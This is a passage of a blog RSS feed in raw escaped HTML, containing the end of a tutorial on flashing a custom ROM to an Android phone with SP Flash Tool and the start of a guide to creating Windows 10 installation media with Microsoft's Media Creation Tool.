&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXfpaqoYDjZht8PEwulAc3MWnGiZ3MF90EvJSBUcQsq8_SFgor-TsTRLcy4VsX_L3uLNB05sx8Isr8BMn4Hhp6IRh0QztLTHSUkQTlTIAZ4Npf314x_A4V2u15dZFMOu-KbdxcFi4H5nM/s1600/settings7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="541" data-original-width="1003" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXfpaqoYDjZht8PEwulAc3MWnGiZ3MF90EvJSBUcQsq8_SFgor-TsTRLcy4VsX_L3uLNB05sx8Isr8BMn4Hhp6IRh0QztLTHSUkQTlTIAZ4Npf314x_A4V2u15dZFMOu-KbdxcFi4H5nM/s640/settings7.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;This step will enable you to install driver setup which you've downloaded earlier by disabling driver signature enforcement - &lt;span style="color: #0b5394;"&gt;&lt;b&gt;This is safe&lt;/b&gt;&lt;/span&gt;....&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h4&gt;
&lt;b&gt;&lt;u&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Step 2 :&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Now, you need to install driver setup by extracting the archive file you've downloaded&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Extract SP_Driver_V2.0_Install.exe/setup.exe from SP_Driver_V2.0_Install.rar using 7zip or any other
suitable extracting tool.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;This installation is normal like any other software, so I think you can do it on your own.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;h4&gt;
&lt;b&gt;&lt;u&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Step 3 :&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Now, Open flash tool&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0FaDFo4WJbx0u5Vd1DKDhO6LcKihANdwTVO7-WqPkUU02PsjTx8n3UCgIDVZS0C_8nR1euVptZQUe7qJkX9YktD0zyhUx_IsONKl6VU880ZTetGy5x6j2DMbQd_FUd8HV5pXuPa9tVRM/s1600/flashtool.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="727" data-original-width="1363" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0FaDFo4WJbx0u5Vd1DKDhO6LcKihANdwTVO7-WqPkUU02PsjTx8n3UCgIDVZS0C_8nR1euVptZQUe7qJkX9YktD0zyhUx_IsONKl6VU880ZTetGy5x6j2DMbQd_FUd8HV5pXuPa9tVRM/s640/flashtool.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9FzLeiLc2qyR1AxqDw-VF6oiW0pv1WakB68WTC6EYsq10xWa_2S1JjGXu33MnAKd8fOgfDK7XEL9hTK7IxB4uzmJyZY5QnS6BohSyD6_QzwndquaiyiXJHmgWuihleVCYzb0779aVFy4/s1600/flashtool2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="725" data-original-width="1365" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9FzLeiLc2qyR1AxqDw-VF6oiW0pv1WakB68WTC6EYsq10xWa_2S1JjGXu33MnAKd8fOgfDK7XEL9hTK7IxB4uzmJyZY5QnS6BohSyD6_QzwndquaiyiXJHmgWuihleVCYzb0779aVFy4/s640/flashtool2.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIBmUYWoh27rHyMCio8KyXBWBT5o7tXT9QuWPuTPwDSSzpHHbs6wzax7atLEcH7a1wf-gKkZzGnY99CdWTwU7O_10XdIeTUxSJopPgTJFxxej-Pg4MgQuseoXFXDXyPmgHnL-FhVVHyYE/s1600/flashtool3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="727" data-original-width="1365" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIBmUYWoh27rHyMCio8KyXBWBT5o7tXT9QuWPuTPwDSSzpHHbs6wzax7atLEcH7a1wf-gKkZzGnY99CdWTwU7O_10XdIeTUxSJopPgTJFxxej-Pg4MgQuseoXFXDXyPmgHnL-FhVVHyYE/s640/flashtool3.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Then select the Android Scatter.txt file from the custom ROM files, this will tell the SP Flash tool which files needs to be flashed to your mobile.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;If you want to Save UserData on your device, Untick userdata from the list.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigsTHPcGktN4YbEUA9a3ZtwlQ_LIPaPe7tayDJfxNPpZY4kVuAjpFF0fkkCeZjdpnr4vghMNMtd-XhH77j7GyH22X8QYfznTuJjzdOBTuNQpx-ZqmIlIYOVBg82CsNF_KHxMZw7rUImb8/s1600/flashtool4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="725" data-original-width="1365" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigsTHPcGktN4YbEUA9a3ZtwlQ_LIPaPe7tayDJfxNPpZY4kVuAjpFF0fkkCeZjdpnr4vghMNMtd-XhH77j7GyH22X8QYfznTuJjzdOBTuNQpx-ZqmIlIYOVBg82CsNF_KHxMZw7rUImb8/s640/flashtool4.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Click on download, then switch off your Android Mobile and connect it to the PC using the compatible USB cable.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstVdBcw-5E-NaqALOln6Dq6xf7rU6RaflBp4oExvKV8P3CJ6MNkZ-666opVzaaBZYTvehwDifKlNTYbEdSE2dX7pThHIDL_KFCHaGt9HglxC722lwFL1XkeMuyRPnc7dnBDBTuk4q0bs/s1600/flashtool5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="729" data-original-width="1363" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstVdBcw-5E-NaqALOln6Dq6xf7rU6RaflBp4oExvKV8P3CJ6MNkZ-666opVzaaBZYTvehwDifKlNTYbEdSE2dX7pThHIDL_KFCHaGt9HglxC722lwFL1XkeMuyRPnc7dnBDBTuk4q0bs/s640/flashtool5.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;As soon as your PC finds your device, SP Flash tool show the details of your device similar to the image below:&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaDWEzA8WV1eO8owEHPEu4hNJkM_112lAOazLkqD2qVHVKhV8z-7wuog2oomC4SzYbwNQMNfUESJiU1WpVpy9pvXt2Ov-OO3YT6BZTIp2DSS0I-tuk6nWJX_d7x17OSET82NhDJhp42Zc/s1600/flashtool6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="729" data-original-width="1363" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaDWEzA8WV1eO8owEHPEu4hNJkM_112lAOazLkqD2qVHVKhV8z-7wuog2oomC4SzYbwNQMNfUESJiU1WpVpy9pvXt2Ov-OO3YT6BZTIp2DSS0I-tuk6nWJX_d7x17OSET82NhDJhp42Zc/s640/flashtool6.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Then you see the progress bar in the bottom of the SP Flash tool which shows the percentage of the flashing process..&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;After successfully flashing your device, a green tick will appear like the image below:&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYL13X2OnjhBUFnzoPpZk2uCCS2L8np1DGqnjGclIpmZ-4KbAAk0cqnyB70NuVlIGuk2r9KnxVSM1UeKEZq10N_9YpcDggF-erGR7qYZnyQxd-ldOv9fyhEcl5PY1P_6eQ1hco3YXJgWM/s1600/flashtool5+%25281%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="187" data-original-width="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYL13X2OnjhBUFnzoPpZk2uCCS2L8np1DGqnjGclIpmZ-4KbAAk0cqnyB70NuVlIGuk2r9KnxVSM1UeKEZq10N_9YpcDggF-erGR7qYZnyQxd-ldOv9fyhEcl5PY1P_6eQ1hco3YXJgWM/s1600/flashtool5+%25281%2529.PNG" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;u&gt;&lt;span style="color: #b45f06;"&gt;&lt;b&gt;Note:&lt;/b&gt;&lt;/span&gt;&lt;/u&gt; Factory Reset in Recovery Mode after flashed to 6.0 is suggested but not compulsory (It can prevent some
minor OS update bugs).&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Then you are good to disconnected your device and turn if on..&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;As it is the first boot of the device after flashing, it would take a few minutes longer than usual to configure your device.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;u&gt;&lt;span style="color: #0b5394;"&gt;&lt;b&gt;Some other useful information:&lt;/b&gt;&lt;/span&gt;&lt;/u&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;1. Flashing via SP Tool will not destroy the warranty&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;2. Root access not required for this&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;3. You will get OTA (Wireless update) after flashing&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;I hope you enjoy this tutorial, and shoot your problems in the comments section below, if any!..&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Thank You&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDWFf4gZS0in6Dv72i43JiATSjbF_2wlJvOevE7xvf3qHcNRv5oOkygf-gbxgI8yIDSbm6hlTSSIvl2C9NXsYQW7CJ5VP3KfYZSmFIo9iIv68H9vMvuPiBf6LuwHOVlJhgHUDH7JeSbg/s72-c/flash-custom-rom-on-android_2.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><georss:featurename xmlns:georss="http://www.georss.org/georss">Hyderabad, Telangana, India</georss:featurename><georss:point xmlns:georss="http://www.georss.org/georss">17.385044 78.486671</georss:point><georss:box xmlns:georss="http://www.georss.org/georss">16.9002155 77.841224 17.8698725 79.132118</georss:box></item><item><title>How to clean install windows 10 using USB and ISO</title><link>https://snacksofhacks.blogspot.com/2015/08/how-to-clean-install-windows-10-using.html</link><category>MuSt C</category><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 25 Aug 2015 20:50:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-2348136665945324221</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;H&lt;/b&gt;&lt;/span&gt;i, friends after a long a I came here to explain you a useful post on how to install windows 10 using iso and usb.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;So, let's begin--☻&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;First of all, download &lt;a href="http://www.microsoft.com/en-us/software-download/windows10" target="_blank"&gt;windows 10 media creation tool&lt;/a&gt; you can also select whether 32-bit or 64-bit if your system is 32-bit then download 32-bit or download 64-bit and after installing run it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;NOTE: TO CHECK WHETHER YOUR COMPUTER IS 32-BIT OR 64-BIT FOLLOW THIS:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Right click on the computer and go to properties and see under the section SYSTEM &amp;gt; SYSTEM TYPE.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;you will see the below window &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizDaka6Bu2_6P35TVH8i4cLzvB5ozajZiANXsICF649QKKKaHOo-c97y6xla-5EfuS3ekompknu9TRMTskxZ4uMJiMkMGSTF5ccK0k6sLa0j9TXuZ4V2_NKbhpRu49HB2yvVjYTiYIRoI/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizDaka6Bu2_6P35TVH8i4cLzvB5ozajZiANXsICF649QKKKaHOo-c97y6xla-5EfuS3ekompknu9TRMTskxZ4uMJiMkMGSTF5ccK0k6sLa0j9TXuZ4V2_NKbhpRu49HB2yvVjYTiYIRoI/s320/1.jpg" width="320" /&gt;&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;At this screen you can select whether to upgrade your current pc or create an installation file for installing on other pc it gives you an iso file.So choose your desired option and click next.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_i7YwDfX-oD_tpA2IEiNA1sLftHGeX4yZHInH4RL911pspdyyYtXldADLezxt-4xrNencphRXXNBLS7XJl44fJ_RI6qsDfVGMVXUCZMSrt6MJTC0wlJAjKsyNh16nVrvGsV3C7iXclA/s1600/2a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_i7YwDfX-oD_tpA2IEiNA1sLftHGeX4yZHInH4RL911pspdyyYtXldADLezxt-4xrNencphRXXNBLS7XJl44fJ_RI6qsDfVGMVXUCZMSrt6MJTC0wlJAjKsyNh16nVrvGsV3C7iXclA/s320/2a.jpg" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;After that select the language and edition, MICROSOFT provides several editions and different editions allows different updates for your pc, I recommend you to select PRO as all the useful updates are given to this edition and finally architecture it is what OS bit you want either 32 or 64 bit, click next.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX3rSa0bpR6uq8TYkQ7My6jX3tuavj23hmSTFHVY34UrIaV5r0xOao2etgnuw-vl2zJ58ZjXN2u7q-DWZwgFmO4UrNON0_U9yHxbbBToIjhvNH3jubh9lW04E8ZWGAt4S0CUecXspnY98/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX3rSa0bpR6uq8TYkQ7My6jX3tuavj23hmSTFHVY34UrIaV5r0xOao2etgnuw-vl2zJ58ZjXN2u7q-DWZwgFmO4UrNON0_U9yHxbbBToIjhvNH3jubh9lW04E8ZWGAt4S0CUecXspnY98/s320/3.jpg" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Here, you can choose to install your os directly on to a usb to boot or you can save an ISO file on system drive choose whatever you want I'd select iso file as we can use it to create many copies. Click next.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWEW3YnAYvmiBK2uLJqtIReTiFkt2J4VjF3BvaAm7jdnr1rMpezyiiZTag1MGAU2BzvaXwYQNrPaMCdhaVT5OozMo4t8Ge9yzhPn1QiRSeuQkSnWzBnVIUI55Vp8LMu_tEXfqLSTh88qM/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWEW3YnAYvmiBK2uLJqtIReTiFkt2J4VjF3BvaAm7jdnr1rMpezyiiZTag1MGAU2BzvaXwYQNrPaMCdhaVT5OozMo4t8Ge9yzhPn1QiRSeuQkSnWzBnVIUI55Vp8LMu_tEXfqLSTh88qM/s320/4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;And select a path for the iso file to save on you drive. Click save.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
